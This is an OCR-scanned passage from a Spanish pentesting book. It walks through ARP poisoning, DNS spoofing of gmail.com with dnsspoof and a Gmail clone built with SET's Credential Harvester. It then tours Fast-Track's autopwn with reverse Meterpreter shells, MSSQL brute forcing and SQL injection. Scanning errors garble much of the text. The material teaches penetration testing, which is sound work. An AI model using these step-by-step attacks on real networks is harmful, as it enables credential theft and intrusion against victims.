fichero  /proc/sys/mt/ipv4/ipJorward,  cambiando  su  valor  de  0  a  1.  De  este  rnodo  se  consigue  que  el 
trafico  que  no  es  dirigido  a  la  maquina  del  atacante  se  enrute  hacia  el  exterior.  En  este  instante  tcdo 
e!  trafico  generado  por  la  victima  pasa  por  la  maquina  del  atacante,  por  ejemplo  si  se  abre  Wireshark 
u  otio  anaiizador  de  trafico  se  podria  visualizar  este  hecho,  e  incluso  obtener  informacion  sensible, 
como  pcdrian  ser  las  credenciales  de  un  login. 

La  victima  quiere  unas  credenciales  en  concreto,  para  ello  se  requierc  controlar  las  paginas  web 
y  veracidad  de  estas  que  la  vlctima  visita.  Se  utilizara  la  tdcnica  de  DNS  Spoofing  para  consegiur 
que  cuando,  por  ejemplo  la  victima  intente  entrar  en  Gmail,  5a  direccion  TP  que  se  le  entregue  sea 
rcalmente  la  de  la  maquina  del  atacante. 

Para  esta  tecnica  se  utiliza  la  herramienta  dnsspoof  la  cual  necesita  de  un  archivo  donde  se 
especifique  la  direccion  IP  que  se  otorgara  a  la  victima  cuando  pregunte  por  un  dominio  concreto. 
Lo  primero  que  se  debe  crear  es  un  archivo,  similar  al  tfpico  hosts: 

llDireccion  IP  Dominio  solicitado 

192.168.1.40  gmail.com 

192.168.1. 40  informatica64 . com 

192.168.1.40  flu-project.com 

En  el  fichero  anterior,  el  cual  en  el  ejemplo  se  denominara  hosts,  se  especifica  una  lista  con  dos 
campos.  El  primer  carnpo  indica  la  direccion  IP  que  se  entregara  a  la  victima  cuando  pregunte  por  el 


dominio  que  se  encuentra  en  el  campo  de  la  derecba,  Para  arrancar  la  herramienta  dnsspoof  se  debe 
ejecutar  la  siguiente  insUnccion  dnsspoof  -i  ethO  -f<ruta fichero  creado>.  ' 

rootgbt : /pentest/explcits/sat#  cd  • . "  ‘ 

root@bt:-#  nano  hosts 

root@bt:-#  dnsspoof  -i  eth0  -f  hosts 

dnsspoof:  listening  on  ethe  [udp  dst  port  53  and  not  src  192.188.1.40] 

Fig  6.35:  Ejecuci6n  de  dnsspoof  en  la  maquina  del  atacante 

Ahora  hay  que  esperar  que  la  maquina  victima  realice  una  peticion  DNS  pregun  tan  do  por  la* 
direccion  gmail.com.  Cuando  esto  suceda  la  peticion  llegara  antes  a  la  maquina  del  atacante, 
gracias  a!  envenenamiento  ARP.  La  herramienta  dsns  poof  st  encargara  de  falsear  la  respuesta  con  la' 
inionnacion  que  se  ha  detailado  en  el  fichero  de  texto,  en  la  imagen  el  fichero  hosts. 

Por  ultimo,  el  atacante  configura  en  su  maquina,  con  ayuda  de  SET,  una  pagina  web  cionada  del  sitio' 
gmail.com.  De  este  modo,  cuando  la  vlctima  pregunte  a  su  DNS  por  la  direccion  IP  de  gmail.com , 
dicha  peticion  sera  interceptada  y  falseada,  proporcionando  una  direccion  IP  falsa.  El  navegador  de 
la  victima  realizara  una  conexion  realmente  con  la  maquina  del  atacante,  donde  se  encontrara  una 
pagina  web  cionada  de  Gmail.  Cuando  la  victima  inserte  credenciales,  dstas  seran  capturadas  por 
SET. 

En  SET  se  elegira  la  opcion  "Website  Attack  Vectors”  con  la  que  se  creara  el  sitio  web  falso.  Al 
utilizar  la  opcion  “ Credential  Harvester  Attack  Method”  se  recolectaran  las  credenciales  que  la 
victima  introduzca  en  dicho  sitio  web.  Ademas,  no  se  utilizara  la  plantilla  de  Gmail  ya  que  se 
encuentra  desactualizada,  se  elegira  la  opcion  de  clonacion  de  sitio.  Tras  clonar  el  sitio  web  de 
Gmail,  ya  se  tiene  preparado  el  sitio  web  falso. 


Cuando  la  victima  introduzca  en  su  navegador  el  dominio  gmail.com  realmente  estara  aecediendo  a 
la  pagina  web  que  ofrece  la  maquina  atacante.  Como  se  puede  observar  el  sitio  web  es  una  clonacion 
casi  perfecta  del  sitio  web  original.  La  vlctima  introducira  sus  credenciales  y  sera  reenviada  al  sitio 
web  real,  por  lo  que  no  ss  levantara  gran  sospecha  sobre  dicha  accion. 


Melasploit  para  Penlesters 


Par  ultimo,  hay  que  recalcar  lo  que  mostro  la  herramienta  dnsspoof  cuando  modified  las  peticiones 
realizadas  para  resolver  el  nombre  de  dominio  gmail.com.  En  la  imagen  se  puede  visualizar  como  se 
spoofea  la  peticion.  Tambien  cabe  destacar  que  si  la  maquina  vlctima  hubiese  cacheado  la  resol uc ion 
de  gmail.com  el  ataque  no  tendria  exito,  pero  generalmente,  en  algtin  momenta  esa  cache  se  vacia, 
ya  sea  porqtie  la  maquina  se  apaga,  o  porque  ha  pasado  una  cantidad  de  tiempo  considerable. 


root@bt:~#  nano  hosts 

rootght:-#  dnsspoof  *i  ethfl  -f  hosts 

dnsspoof:  listening  on  ethe  (udp  dst  port  53  and  not  src  192-.  168. 1.40] 


192 . 168 .1.37. 56803  >  80.58.61.254.53 
192.160.1.37.65375  >  89.58.61.254.53 
192.168.1.37.52869  >  89.58.61.254.53 


45733+  A?  graail.coiit 
25943+  A?  gmail.com 
58934+  A?  gmail.com 


Pig  6.37:  Modificaeiones  de  dnsspoof  a  las  peticiones  DNS  originates 
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Capitulo  VII 
Mas  alia  con  Fast-Track 


1.  ;,Que  es  y  para  que  sirve? 

A  estas  al  tufas  del  libro  se  debe  comprender  que  la  automalizaciqn  en  un  lest  de  intrusion  aytida, 
y  mucho,  a  realizar  la  parte  procedimental  de  este.  Con  esta  idea  aparecid  Fast-Track,  tin  script  de 
Python ,  el  dial  permile  al  usuario  configurar  de  manera  sencilla  dislintos  tipos  de  ataque  que  puetlen 
resultar  complejos.  Fast-Track  utiiiza  a  Metasploit  framework  para  la  adicion  de  caractensticas, 
entre  las  que  se  encuentran  inyecciones  SQL,  ataques  mediante  el  uso  de  exploits  o  ataques  de  tipo 
dient-side. 

Fast-Track  dispone  de  distiiitos  metodos  de  interaccion  con  la  herramienta: 

-  El  modo  interactive. 

-  El  modo  de  ilnea  de  comandos. 

-  El  modo  web. 

El  modo  de  linea  de  comandos  es  parecido  a  la  interfaz  de  Metasploit  msfcli.  Por  olro  lado,  el  modo 
web  permite  obtener  un  entorno  graftco,  a  traves  de  ia  utilizacion  de  una  interfaz  inluitiva  y  sencilla. 

El  objetivo  de  Fast-Track  es  el  de  facilitar  la  interaccion  del  usuario  con  &\  framework  de  Metasploit. 
Hay  que  diferenciar,  que  Fast-Track  tiene  un  fin  similar  al  que  proporcionaba  SET  en  la  ingenien'a 
social  y  el  uso  de  Melasploit  para  obtener  privilegios.  En  algunas  ocasiones,  muehos  usuarios 
definen  a  SET  y  Fast-Track  como  sistemas  independientes,  pero  en  realidad,  el  fin  de  estos  es 
utilizar  una  interfaz  que  gestione  los  recursos  que  ofrece  Metasploit  de  manera  sencilla  e  intuiliva 
para  aprovecharios  en  una  rama  concreta  de  la  seguridad  informatica. 


2.  Fast-Track  y  sus  posibles  ejecuciones 

Como  se  ha  mencionado  anteriormente  Fast-Track  proporciona  distintas  vlas  para  la  interaccion  con 
este.  Este  hecho  proporciona  comodidad  al  usuario  para  poder  elegir  la  via  con  la! que  se  encuentre 
mas  comodo  trabajando. 


Es  realmente  interesante  conocer  estas  vias  de  interaction  con  la  herramienta,  ya  que,  adem&s  de 
la  comodidad  qne  proporcionan,  proponen  mayor  automatization  y  vias  para  cargar  un  entorno  o 
vector  de  ataque  de  manera  mas  rapida  de  lo  habitual. 

Durante  el  desarrollo  de  este  capltulo  se  utilizara  una  distribution  de  GNU/linux  como  es  BackTrack 
5  R3.  Esta  distribucion  proporciona  la  herramienta  Fast-Track  en  la  ruta  /pentes f/exp I o i ts /fas (track. 

La  llnea  de  comandos  vuelve  a  ser  fundamental  en  este  tipo  de  herramientas,  pero  la  interfaz  grafica 
mediante  el  iiso  de  un  servidor  web  proporciona  aire  fresco  y  facilidad  de  aprendizaje  para  el  usuario 
de  Fast-Track. 

root@ht:/pentest/exploits/fasttrack#  python  fast-track. py 


Fast-Track  -  A  new  beginning... 

Automated  Penetration  Testing 

Written  by  David  Kennedy  (ReLIK) 

Please  read  the  README  and  LICENSE  before  using 

this  tool  for  acceptable  use  and  modifications. 

Modes : 

Interactive  Menu  Driven  Mode:  -i 

Command  Line  Mode:  -c 

[Web  GUI  Mode  -g 

Examples:  . /fast-track. py  -i 
. /fast-track. py  -c 
. /fast-track. py  *g 
. /fast -t rack. py  -g  <portnum> 

Usage:  . /fast-track. py  <mode> 

Fig  7.0 1 :  Modos  de  ejecucion  de  Fast-Track. 


Fast-Track  inter activo 

Esle  modo  es  e!  mas  conocido  por  todos  los  usuarios  de  Meiasploil  y  Fast-Track.  Proporciona  tin 
menu  similar  al  de  SET  con  el  que  el  usuario  solo  debe  ir  navegando  a  traves  de  distintos  menus. 
Esta  option  proporciona  facilidad  de  uso  para  usuarios  no  expertos  en  el  use  de  Metasploii  en  su 
modo  msf console,  ya  que  proporciona  ciertos  ataques  conocidos  que  se  pueden  if  configurando  de 
manera  trivial  a  traves  de  los  distintos  menus. 

Para  ejecutar  Fast-Track  con  este  modo  se  debe  lanzar  la  siguiente  instruccion  python  <ruta  fast- 
trackpy>  -/,  es  decir,  se  debe  indicar  el  parametro  i. 


Como  se  ha  menciouado  y  como  se  puede  visualizar  en  la  imagen,  Fast-Track  en  modo  interactive 
proporciona  menus.  Estas  opciones  se  pueden  agrupar  por  tematicas,  las  cuales  se  enuncian  a 
continuacion: 

-  Tutoriales.  El  propio  entorno  de  Fast-Track  proporciona  tutoriales  para  que  el  usuario 
pueda  ulilizar  la  herramienta  de  manera  sencilla. 

-  Actualizacion  del  entorno.  Se  puede  ejecutar  la  aetualizaeion  de  Fast-Track  de  manera 
automatizada,  con  lo  que  se  consigue  mantener  actualizado  el  entorno  de  una  manera  sencilla 

Herramientas  para  manipuiacibn  y  gestion  de  payloads.  Se  dispone  de  la  posibilidad  de 
utilizar  Fast-Track  para  generar  payloads,  e  incluso  poder  convertir  los  payload  de  binario 
a  hexadecimal. 

-  Ataques  SQL.  Las  inyecciones  SQL  despiertan  cierta  admiracibn  en  el  mundo  de  la 
seguridad  informatica,  y  Fast-Track  proporciona  mecanismos  para  automatizar  el  proceso  de 
ataques  a  las  bases  de  datos  SQL. 

Ejecucion  de  Nmap  mediante  scripting.  Los  scripts  de  Nmap  ayudan  a  deteetar 
vulnerabilidades  a  traves  de  escaneos  con  esta  herramienta.  Estos scripts  aportan  funcionalidad 
extra  a  una  de  las  herramientas  de  fingerprint  mas  famosas  en  el  mundo  de  la  seguridad 
informatica. 


-  Automatizacion  con  autopwn.  Como  se  ha  estudiado  en  este  libro  autopwn  proporciona 
tecnicas  para  automatizar  el  proceso  de  exploiting  en  sistemas,  Fm’/-Troc/c  pef  mite  automatizar 
el  proceso  de  configuracion  de  autopwn. 

-  Posibilidad  de  automatizar  la  preparation  de  un  ataque  masivo  con  ia  tecnica  Client-Side. 
Esta  tecnica  se  ha  observado  en  el  libro  en  numerosas  ocasiones,  colocando  el  peso  del  ataque 
en  ia  parte  del  cliente.  El  ataque  se  realizara,  comiinmente,  sobre  el  navegador  del  usuario,  y 
se  necesita  que  este  realice  alguna  accion. 

-  Exploits.  Se  ofrece  un  listado  de  exploits  que  pueden  ser  lanzados  sobre  un  objelivo.  El 
proceso  de  ejecucion  de  estos  exploits  es  lolalmente  guiado  poi  bast-Tiack. 

Fast-Track  Iinea  de  comandos 

La  Iinea  tie  comandos  que  proporciona  Fast-Track  es  una  de  las  mas  curiosas  maneras  de  iiilemcliiai 
con  ia  herramienta.  Para  ejecutar  este  modo  se  debe  lanzar  la  siguienlc  instruccion  python  <ruta 
fast-track. py>  -c,  donde  c  es  el  parametro  que  indica  el  modo  command  line. 

Como  sc  puede  visualizar  en  la  imagen  la  ejecucion  de  Fast-Track  con  el  parametro  c  proporciona 
una  salida  en  la  que  se  puede  observar  el  menu  principal,  el  cual  se  visuaiizaba  con  el  modo 
interact!  vo  comentado  anteriormente. 

La  forma  de  interaetuar  con  Fast-Track  en  esle  modo  es  reaimente  curioso,  se  debe  indicar  en  la 
misma  instruccion  el  numero  de  la  opcion  que  se  quiere  seleccionar,  por  ejemplo,  si  el  usuano  sabe 
que  quiere  ejecutar  la  opcion  de  exploits,  la  cual  es  la  opcidn  numero  seis,  se  deberla  ejecutar  python 
<rulafast-lrackpy>  -c  6.  Como  se  puede  visualizar  en  la  imagen,  se  auto  ejecula  la  opcion  6,  la  cual 
proporciona  un  nuevo  menu. 

Payloads: 

1.  Meterpreter  Reverse  TCP  Shell 

2.  Generic  Bind  Shell 

3.  Meterpreter  Reverse  VNC  Inject  (GUI) 

4.  Reverse  TCP  Shell 

Also,  I  added  an  ettercap  option,  if  you  have  ettercap  installed  then  specify  a 
1  flag  at  the  end  of  the  usage  to  use  ettercap  and  poison  a  specific  victim. 

Examples:  . /fast-track. py  -c  6  127.0.9,1  1  1 

. /fast-track. py  -c  6  192,168.1.34  2  1 

Usage:  ,/fast-track.py  -c  6  <ipaddn>  (your  main  ip  addy,  i.e.  ethS)  <payload>  <1  for  ettercap,  e 
Ise  dont  specify>  ^ 

Specify  your  payload: 

1.  Windows  Meterpreter  Reverse  Meterpreter 

2.  Generic  Bind  Shell 

3.  Windows  VNC  Inject  Reverse_TCP  (aka  “Da  Gui") 

4.  Reverse  TCP  Shell 

Enter  the  number  of  the  payload  you  want:  _ _ _ _ _ 

Fig  7.03:  Ejecucion  de  Fast-Track  modo  consuls. 


CapUulo  VII.  Mas  alia  con  Fast-Track 


Para  ejecutar  el  nuevo  menu  que  se  puede  observar,  se  debera  ejecutar  la  instmcti6n)7y//?o/?  <rula 
fas(-track.py>  -c  6 1,  si  se  quiere  configurar  el  exploit  numero  uno.  Se  obtendra  un  nuevo  dialogo, 
al  cual  se  debe  contestar  mediante  el  uso  de  la  Iinea  de  comandos.  Es  por  esta  razon,  que  se  requiere 
especificar  toda  la  configuracion  a  traves  de  una  instruccion  de  iinea  de  comandos. 

i,Esto  es  reaimente  util?  La  respuesta  es  si.  Se  puede  utilizar  en  el  uso  de  scripts  realizados  por  el 
propio  usuario,  por  ejemplo,  para  configurar  la  propia  automatizacion  de  un  proceso  de  seguridad 
concreto  donde  se  pueden  utilizar  distintas  vias  que  proporciona  Fast-Track. 


Fast-Track  via  web 

Con  este  modo  de  inleraceion  se  utiliza  el  navegador  web  mediante  una  Interfax  grafica  amistosa 
para  presentar  Fast-Track  mas  cercano  al  usuario.  Se  ejecuta  un  servidor  web  que  presents  tin  silio 
web  por  el  que  se  puede  interaetuar  con  el  mismo  menu  que  se  presentaba  en  el  modo  interactive. 

Para  ejecutar  y  configurar  el  modo  web  se  puede  lanzar  la  siguiente  instruccion  python  <mia  f'ast- 
track.py>  -g.  Tambien  se  puede  utilizar  la  instruccion  python  <ruta  fast-track.p\»  -g  <puerto>.  Si 
no  se  indica  el  puerto,  por  defecto  se  ejecutara  sobre  e!  44444. 

*£%»*****ij:*»*****it*4l*»*»#************4*****^*4.* 

Performing  dependency  checks...  ******* 

»4**44*4*4*4**t*H-****«*****4i**»**> ************* 

***  FreeTDS  and  PYMMSQL  are  installed.  (Check)  *’* 

***  PExpect  is  installed.  (Check)  *** 

***  ClientForm  is  installed.  (Check)  *** 

***  Beautiful  Soup  is  installed.  (Check)  **'* 

Also  ensure  ProFTP,  WinEXE,  and  SQLite3  is  installed  from 
the  Updates/Installation  menu. 

Your  system  has  all  requirements  needed  to  run  Fast-Track! 

4*4************* **44**44»******«****4*»» 

Fast-Track  Web  GUI  Front-End 
Written  by:  David  Kennedy  (ReLIK) 

**************************************** 

Starting  HTTP  Server  on  127.6.0.1  port  44444 

***  Open  a  browser  and  go  to  http://127. 0.0. 1:44444  *** 

Type  <control>-c  to  exit.. 

Fig  7.04:  Conltguracion  del  silio  web  para  interaetuar  con  Fast-Track. 

Una  vez  que  se  lanza  el  servidor  se  puede  acceder  a  el  a  traves  de  la  direccion  http:// 1 27.0.0.  i  :44444. 
Como  se  puede  visualizar  en  la  imagen  el  aspecto  que  ofrece  este  modo  de  inleraceion  es  bastante 
mas  agradable  e  intuitivo  que  ia  Iinea  de  comandos.  La  presentacion  gralica  de  Fast-Track  ayuda  al 
usuario,  ya  que  presenta  en  la  parte  izquierda  el  menu  que  se  puede  observar  en  el  modo  interactive. 
El  uso  de  los  dies  de  raton  para  nayegar  por  Fast-Track  amenizan  el  uso  de  la  herramienta  y 
proporciona  ventajas  adicionaies,  como  por  ejemplo  que  el  uso  de  los  lutoriales  se  pueda  leer  de 
manera  mas  data. 


3.  Tutoriales  en  Fast-Track 

Los  tutoriales  que  ofrece  Fast-Track  a  traves  de  cualquier  modo  de  interaccion  con  la  herramienta 
proporcionan  una  ayuda  muy  interesante  al  usuario.  En  este  apartado  se  utilizara  el  modo  interactive 
para  ejemplificar  el  proceso  de  consulta  de  los  tutoriales  de  la  herramienta. 

Fast-Track  Main  Menu: 

1.  Fast-Track  Updates 

2.  Autopwn  Automation 

3.  Nmap  Scripting  Engine 

4.  Microsoft  SQL  Tools 

5.  Mass  Client-Side  Attack 
5.  Exploits 

7.  Binary  to  Hex  Payload  Converter 

8.  Payload  Generator 

9.  Fast-Track  Tutorials 
16.  Fast-Track  Changelog 

11.  Fast-Track  Credits 

12.  Exit  Fast-Track 


Fig  7.06:  Election  de  la  opcidn  de  tutoriales. 


Capitulo  VII.  Mas  alia  con  Fast-Track 


En  el  menu  principal  de  Fast-Track  se  puede  observar  una  opeion  denominada  “Fast-Track 
tutorials  .  Esta  opeion  presenta  una  nueva  pantalla  en  la  que  se  puede  escoger  el  tutorial  requerid? 
por  el  usuario,  diferenciado  por  tematicas.  a 


{Fast-Track  Tutorials  Menu:  '  — - - 

1.  General  Functionality  and  Movement  in  Fast-Track 

2.  How  to  update  Fast-Track 

3.  MetaSploit  AutoPwn 

4.  SQL  1433  Hacking 

5.  SQL  Injection  HOWTO 

6.  FTP  Brute  Forcer 

7.  Spawning  a  Shell 

8.  Exploits 

9.  Mass  Client-Side  Attacks 

10.  Binary  to  Hex  Payload  Generator 

(q)uit 

Enter  number:  j 

Fig  7.07:  Tutoriales  disponibles  en  Fasl-Dack. 

Cuando  el  usuario  selecciona  una  tematica,  esta  puede  contener  distintos  tutoriales  en  retacion  a  las 
distmtas  functonalidades  que  el  tutorial  ofrece.  Todo  es  realmente  sencillo  de  maneiar  y  seleccionar 
ya  que  los  diferentes  menus  ayudan  en  la  navegacion  por  la  distinta  ayuda  ofrecidapor  la  herramienta. 

ui  el  siguiente  ejemplo  se  ha  elegido  la  opeion  numero  cuatro,  obteniendo  la  ayuda  relacioriacla  con 

,  linclonalldad  seleceionada.  En  Fast-Track  se  ha  intentado  dotar  de  la  maxima  ayuda  posible  con 
el  mayor  grado  de  detaiie. 


SQL  1433  Hacking:  Requirements:  PYMSSQL,  FreeTDS 

Alright,  lets  first  start  off  with  those  of  you  that  are  unfamilar  with 
W33;  1433  ls  Nicrosoft's  default  port  installtion  for 
HSSQL.  This  goes  for  any  version  of  SQL,  by  default  it  installs  on  1433 
and  ls  used  for  primary  means  of  community  for  SQL  Servers,  if  a  website 

SAS  hfS“e  “  s,r  ‘",or,'t1”"' ,te  wb  »*™«r 

tatKS  dock  to  the  SQL  server  via  port  1433. 

™!!”y  y«t- Track  attacks  this  specific  port  is  through  a  “brute  force- 

“ tSk«'™-rtt«PtlI!9-t®  9t,eSS  the  J"itlal  Password-  when  first  installing 
a  SQL  server,  the  administrator  is  asked  if  they  would  like  to  use 
integrated  Windows  Authentication,  use  SQL  Authentication,  or  use  Mixed 
Mode  (a  combination  of  both).  Generally  web  applications  are  easy  to  use 
SQL  authentication  then  mixed  or  integrated. 

Fig  7.08:  Ayuda  sobre  una  herramienta  completa. 


4,  Configuration  de  Fast-Track 

Fast -Track  dispone  de  un  fichero  de  configuracion  en  la  rata  /pentest/exploits/fasttrack/config 
denominado  fasttrack_config.  Este  fichero  es  similar  al  estudiado  en  el  capitulo  de  SET,  es  decir, 


dispone  de  variables  a  las  cuales  se  les  asigna  tin  valor.  Estos  valores  son  leidos  por  Fast-Track  en 
el  instante  que  arranca  la  aplicacion,  adquiriendo  la  information  que  proporcionan  las  variables  del 
fichero. 

Por  defecto,  el  fichero  de  configuracion  no  tiene  un  peso  o  tamano  parecido  al  de  SET,  ya  que  en 
el  fichero  de  configuracion  se  puede  encontrar  poca  informacion  en  comparacion  con  el  archive 
de  SET.  En  la  imagen  se  puede  visualizar  como,  por  delecto  en  la  version  R3  de  la  distribution 
BackTmck  5 ,  simplemente  se  encuentra  la  variable  donde  se  almacena  Metasploit. 


root@bt:/patitest/exf)toit5/fasttrack/coivfi()#  cat  fasttrack  config 

» 

It  FAST-TRACK  CONFIGURATION  FILE.  THIS  IS  VERY  BETA  AND  WILL  BE  ADDED  UPON  AS  THE  NEED  GROWS,  THJ 
S  WAS  TO  MIMIC 

#  THE  CONFIG  FILE  SIMILAR  TO  THE  SOCIAL-ENGINEER- TOOLKIT  (SET). 

It 

itmmmmm 

# 

#  CONFIG  THE  METASPOIT  PATH  HERE  AND  CHANGE  IT  TO  WHATEVER  YOU  WANT 
METASPLOlTPATIWpentest/exploits/frsmework/ 

rQOtgbt:/peute5t/exp\oits/fasttrack/configtf _ _ _ _ 

Fig  7.09:  Fichero  de  configuracion  de  Past-Track. 

Existe  otro  fichero  de  configuracion  en  la  siguieote  ruta  /pentest/ exploits/ fasttrackJkiix/ config 
denominado  config.  Este  fichero  dispone  de  variables  que  cargara  Fast-Track  en  su  arranque  para 
siluar  o  mapear  eiertos  componentes  que  utilizara  la  herramienta  o  cargar  algunos  valores  para  el 
comportamiento  de  la  propia  aplicacion. 


5.  Funcionalidades 

La  herramienta  proporciona  gran  diversidad  de  funcionalidades  como  se  ha  podido  observer  en 
apartados  anteriores.  La  riqueza  que  ofrece  Fast-Track  reside  en  la  versatilidad,  senciliez  y 
automatization  que  proporciona  al  usuario. 

En  este  apartado  se  presen  tan  las  distintas  funcionalidades  con  mayor  detalle.  Es  importanfe 
observar  que  algunas  de  ellas  se  han  implementado  en  este  iibro  de  manera  “artesanal”,  es  decir, 
manuatmenle.  El  principal  objetivo  de  Fast-Track  es  conseguir  que  cuaiquier  action,  que  se  puede 
realizar  con  la  herramienta,  quede  configurada  en  un  tienipo  inferior  a  los  ties  minutos,  lal  y  como 
expone  su  eslogan. 

Autopwn  Automation 

Autopwn  tambien  esta  disponible  en  Fast-Track.  El  ataque  conocido  como  “metralleta”  permite 
realizar  un  ataque  coil  gran  cantidad  de  exploits  en  funcion  de  varias  caracterlsticas,  como  por 


ejemplo,  la  version  de  un  sewicio  que  se  ejecuta  en  la  mdquina  remola,  tin  sistenia  operativo 
concreto,  etcetera. 

Esta  funcionalidad  permite  realizar  la  tecnica  autopwn  de  manera  rapida  y  sencilla,  sin  necesidad 
de  maniputar  Metasploit.  Ademas,  permite  ejecutar  “comandos”  de  Nmap,  como  si  se  estuviefa  en 
la  linea  de  comandos  de  este.  La  ayuda  que  se  ofrece  por  pantalla  acerca  de  la  herramienta  aporla 
faciiidad  para  saber  el  formato  de  las  entradas. 

Fast-Track  Main  Menu: 

1.  Fast-Track  updates 

2.  Autopwn  Automation 

3.  Nmap  Scripting  Engine 

4.  Microsoft  SQL  Toots 

5.  Mass  Client-Side  Attack 

6.  Exploits 

7.  Binary  to  Hex  Payload  Converter 
B.  Payload  Generator 

9.  Fast-Track  Tutorials 

10.  Fast-Track  Changelog 
H.  Fast-Track  Credits 
12.  Exit  Fast-Track 

Enter  the  number:  2 

Fig  7. 1 0:  Eteccion  de  Aulopwn  Automation. 


This  tool  specifically  piggy  backs  some  commands  from  the  Metasploit 
Framework  and  does  not  modify,  the  Metasploit  Framework  in  any  way.  Titis 
is  simply  to  automate  some  tasks  from  the  autopwn  feature  already  developed 
by  the  Metasploit  crew. 

Simple,  enter  the  IP  ranges  like  you  would  in  NMap  i.e.  192. 168. 1,-254 
or  192.168,1.1/24  or  whatever  you  want  and  it'll  run  against  those  hosts-. 

Additionally  you  can  place  NMAP  commands  within  the  autopwn  ip  ranges  bar, 
for  example,  if  you  want  to  scan  even  if  a  host  “appears  down“  just  do 
-PN  192.168.1.1-254  or  whatever. . .you  can  use  all  NMap  syntaxes  in  the 
Autopwn  IP  Ranges  portion. 

When  it  has  completed  exploiting  simply  type  this: 

sessions  -l  (lists  the  shells  spawned) 
sessions  -i  <id>  (jumps  you  into  the  sessions) 

Example  1:  -PN  192.168.1.1 
Example  2:  192.168.1.1-254 
Example  3:  -P8  -v  -A  192.168.1.1 
Example  4:  192.168.1.1/24 

Enter  the  IP  ranges  to  autopwn  or  (q)uit  FastTrack: 

Fig  7.11:  Ejecucion  de  orden  en  nmap. 

En  este  pequeno  ejemplo  se  utilfeara  un  escaneo  estandar  sobre  la  direccion  IP  192. 168.0.66,  en  la 
que  se  encuentra  un  equipo  ciiente  con  sistenia  operativo  Microsoft  Windows  XP  S3.  Cabe  destacar 
que  se  puede  ejecutar  un  escaneo  sobre  un  rango  o  con  otros  valores  que  no  sean  los  de  por  delecto, 
para  mayor  detalle  se  puede  consultar  el  apartado  de  Nmap  en  el  capltulo  2. 

Una  vez  configurado  sobre  que  maquinas  o  que  maquina  se  realizara  el  escaneo  se  debe  configurar 
el  modo  de  conexion  entre  el  exploit  que  produzca  la  explotacion  y  el  alacante.  En  este  ejemplo  se 
configura  el  modo  in  verso. 


Meiasploit  para  Pent  esters 


Capilulo  VII.  Mas  alia  con  Fast-Track 


Do  you  want  to  do  a  bind  or  reverse  paytoad7 

Bind  =  direct  connection  to  the  server 
Reverse  =  connection  originates  from  server 

1.  Bind 

2.  Reverse 

Enter  number:  2 _ _ _ _ 

Fig  7- 12:  Eleccitin  del  metodo  tie  conexion  cuando  se  explotc  uim  maquina  mediantc  autopwn. 

Ti  as  ran lizar  cl  icha  accion  se  creara  una  base  de  datos  y  se  auto  configurara  Meiasploit.  Si  se  obtuviese 
el  eonLrol  de  una  maquina  se  dispondna  de  una  sesion  inversa.  En  este  caso  se  puede;observar  que 
no  se  tiene  que  conllgurar  ninguna  accion  en  la  base  de  datos  ni  en  Meiasploit ,  lo  cual  avuda  a  I  os 
usuarios  con  menos  destreza  en  el  uso  del  framework.  El  payload  que  se  introduce  en  la  maquina 
remota  sera  uno  de  tipo  Meterpreter. 


Nmap  Scripting  Engine 

Nmap  dispone  de  una  funeionalidad  que  aporta  gran  riqueza  y  flexibilidad  a  la  herramienta 
denominada  Nmap  Scripting  Engine.  Con  dicha  funeionalidad  el  usiiario  puede  crear  sus  scripts 
para  ser  ejecutados  por  Nmap  o  utilizar  los  miles  de  scripts  que  existen  de  Nmap  que  aportan  nuevas 
e  interesantes  ftmcionalidades. 

Fast-Track  dispone,  en  sti  opcion  tres  del  menu  principal,  de  la  posibilidad  de  utilizar  scripts 
relacionados  con  cl  protocolo  SMB.  Algunas  de  las  ftmcionalidades  extra  que  se  pueden  obtener  eon 
la  ejecucidn  de  estos  scripts,  y  que  incluso  la  propia  herramienta  Nmap  ha  incluido  en  sus  ultimas 
versiones  son  las  siguientes: 

-  Descubrimiento  de  red. 

-  Dereccion  de  servicios  y  versiones  mejorada. 

-  Explotactdn  y  deteccion  cle  vulnerabilidades. 

-  Averiguar  y  eorroborar  la  existencia  de  malware. 

Microsoft  SQL  Tools 

Esta  funeionalidad  proporciona  distintas  herramientas  para  realizar  acciones  como  inyecciones  SQL, 
pi  ocesos  de  fuerza  bruta  sobre  servidores  de  bases  de  datos,  etcetera.  Esta  es  una  de  las  partes  que 
mas  puede  interesar  a  algunos  auditores  ya  que,  antique  ya  son  muy  conocidas,  las  vulnerabilidades 
SQL  copan  los  primeros  puestos  en  vulnerabilidades  a  nivel  mimdial. 

La  herramienta  MSSQL  Injector  permite  at  usuario  realizar  inyecciones  mediante  distintos  metodos. 
Bn  general,  se  debe  especificar  el  parametro  que  contenga  la  vulnerabilidad  SQL.  Se  puede 
visualizar  como  en  algunos  metodos  se  debe  utilizar  la  palabra  ‘INJECTHERE  para  especificar 
donde  la  herramienta  debe  realizar  la  inyeccion.  Un  ejemplo  serla  http://sitioVuinerable.com/ 
recttrso.aspx?id=  ’INJECTHERE.  " 


Enter  which  SQL  Injector  you  want  to  use: 

1.  SQL  Injector  -  Query  String  Parameter  Attack 

2.  SQL  Injector  -  POST  Parameter  Attack 

3.  SQL  Injector  -  GET  FTP  Payload  Attack 

4.  sqL  Injector  •  GET  Manual  Setup  Binary  Payload  Attack 

(q) uit 

Enter  your  choice: 

Fig  7. 1 3:  Memi  de  SQL  Injector. 

La  herramienta  MSSQL  Bruter  proporciona  una  aplicacion  para  realizar  fuerza  bruta  sobre  un  SQL 
Server.  Iambi  en  se  puede  utilizar  como  herramienta  cle  escaneo  para  real  izar  fingerprinting  de  la 
maquina  remota  buscaiido  puertos  abiertos  para  la  base  de  datos,  visibilidad  con  la  maquina,  etcetera, 

Fnt e r  the  IP  Address  and  Port  Number  to  Attack 

Options:  {ajttempt  SQL  Ping  and  Auto  Quick  Brute  Force 
{m)ass  scan  and  dictionary  brute 

(s) ingle  Target  (Attack  a  Single  Target  with  big  dictionary) 

(f)ind  SQL  Ports  (SQL  Ping) 

(i)  want  a  command  prompt  and  know  which  system  is  vulnerable 
(v)ulnerable  system,  I  want  to  add  a  local  admin  on  the  box... 

(r) aw  SQL  commands  to  the  SQL  Server 

(e)nable  xp_cmdshell  if  its  disabled  (sql2k  and  sql2k5) 

(b)ost  list  file  of  IP  addresses  you  want  to  attack 

( q ) ui t 

Enter  Option: 

Fig  7.1 4:  Menu  de  SQL  Bruter. 

La  ultima  herramienta  sobre  inyecciones  SQL  la  proporciona  SQLPwnage,  con  esta  herramienta 
se  puede  especificar  un  sitio  web  y  mediante  un  proceso  de  crawling  se  obtiene  un  mapa  con  las 
